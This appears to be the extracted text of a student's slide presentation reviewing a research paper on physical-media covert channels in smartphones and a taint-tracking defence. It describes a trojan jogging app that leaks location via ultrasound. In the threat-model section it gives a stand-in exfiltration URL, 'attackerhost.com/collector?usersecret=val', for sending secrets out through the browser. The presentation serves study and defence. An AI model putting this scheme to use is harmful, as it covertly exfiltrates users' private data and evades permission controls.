PHYSICAL MEDIA COVERT CHANNELS ON SMART MOBILE DEVICES -ED NOVAK ,YUTAO TANG, ZIJIANG HAO, QUN LI, YIFAN ZHANG

Presenter: Harshitha Chidananda

TABLE OF CONTENTS

Introduction Main problem Main points and

contributions Challenges Recent work

Strengths and Weaknesses

Open issues/ Direction of future research

My thoughts Summary and

conclusion

Key technical points PMCC Trojan Horse

Malware 5 example PMCCs Defense

mechanism Evaluation

Fundamental shift for computing • Carry sensitive information• Equipped with physical interface

hardware

MAIN PROBLEM

Device carry sensitive information about the user Malwares in many applications Applications access user’s information without permission

MAIN POINTS AND CONTRIBUTIONS

Information leakage malware Uses covert channels over physical “real-world” media, such as sound or light. First to use PMCC(Physical Media Covert Channels) Malware advantages:

New form Stealthy State-of-the-art defenses

Privilege escalation Information leakage

Defense mechanism Balances security with usability

CHALLENGES

Speed As little as 100 bits per second is enough to pose a serious threat

Stealth difficult to defend against. They must go unnoticed by the user Appear to be benign from the point of view of the software. Differentiate between benign and malicious sensor use Not interrupt the user with confirmation dialogs.

KEY TECHNICAL POINTS

Propose a new class of covert channels for smart mobile devices that utilize real world interfaces Generalized as “physical medium covert channels”- PMCC High stealth High speed

Design and implementation of five example PMCCs Use PMCCs to design a new variant of trojan horse malware

appears to be benign but actually leaks sensitive user information. Propose and implement a novel defense scheme that takes a framework approach. Evaluate prototypes of each covert channel and the defense mechanism.

RECENT WORK

Defense mechanisms Taint-analysis

Taint analysis can be used to identify sensitive information as it flows through an application and notifying the user or stopping this sensitive information from leaving the device and being leaked.

Elaborate security policy mechanisms Internal computation for security reasons

Application market curation Market curation techniques aim to identify and remove malicious applications from the market before users

even have a chance to install it.

PART 1:THREAT MODEL

Send information over the Internet without requesting the Internet permission Creating Applications that look normal Dual run using “ScheduledExecutorService” Android timing mechanism Accessing Sensitive Information

Android applications can ask the browser to open URLs on their behalf without declaring the

Internet permission. The attacker can include some

CGI parameters

(E.X., attackerhost.com/collector?usersecret=val)

transmit sensitive information to their own controlled host.

PART 2:TROJAN HORSE MALWARE DESIGN

Example Trojan Application — Jog-LogThe application asks for GPS and microphone permission

User uses jogging app while jogging

Later at night, app uses ScheduledExecutorService

Uses PMCC to transmit location information

Speaker is used to produce ultrasonic signalMicrophone is used to decode the ultrasound signalForms URL with the attacker’s host as a domain

User’s location as CGI parameterThe attacker sets up a special web server to respond to these requests

Records CGI parameters in a file associated with the IP address of the user

The attacker can now find the street address

PART 3: COVERT CHANNEL DESIGN Implementation of five physical media covert channels:

Ultrasound Speaker and Accelerometer Vibration and Accelerometer Flash and Camera User and Gyroscope

PART4 :DEFENSE SYSTEM ARCHITECTURE

PART 4: STAGE 1-GUARD SERVICE

GuardService exposes 3 methods: .add(component, device, tag) .remove(component, device) .lookup(component, device)

• Component begins using a sender device

• .add() is called• Taint-tag from the data flowing is stored in the

guardService

• .loopup() is called• Retrieve taint-tag from any active sender devices

• .remove() is called• When sender services are no longer needed

PART 4: STAGE 11 - TREATMENT

Alert the user weakest choice

Choose One One of the devices is turned off Tunable parameter

Dynamically Switch: Switch dynamically between two sensors.

Rate Limit For devices that needs 2 sensors to work(flash and camera) Limit the rate at which the device can be used

Altering the Signal Increase error rate Careful not to alter useful information

PART 5: EVALUATION

PART 5: EVALUATION

PART 5: EVALUATION

PART 5: EVALUATION

STRENGTHS AND WEAKNESSES

Strengths Good evaluation of each covert channel and defense

mechanisms Succeeds Good results Describes about developing a good malware Describes good defense mechanisms Easy to read

Weaknesses Repetitive No user study

OPEN ISSUES/ DIRECTION FOR FUTURE RESEARCH

Does not focus on the case where the attacker tries to use some physical medium covert channel to communicate with another proximal device.

Experiments on Apple smartphones Influence of defense mechanisms on performance

MY THOUGHTS

Simple English with few terms that needed to be Googled Pictorially eye catching Well explained Best way to make reader understand the importance of security Gave broader perception Realistic overview Good illustrations

SUMMARY AND CONCLUSION

First to use Physical Media Covert Channels Designed specifically for mobile devices New form of malware Novel Defense mechanism Alert community of potential threat

Thank You!QUESTIONS?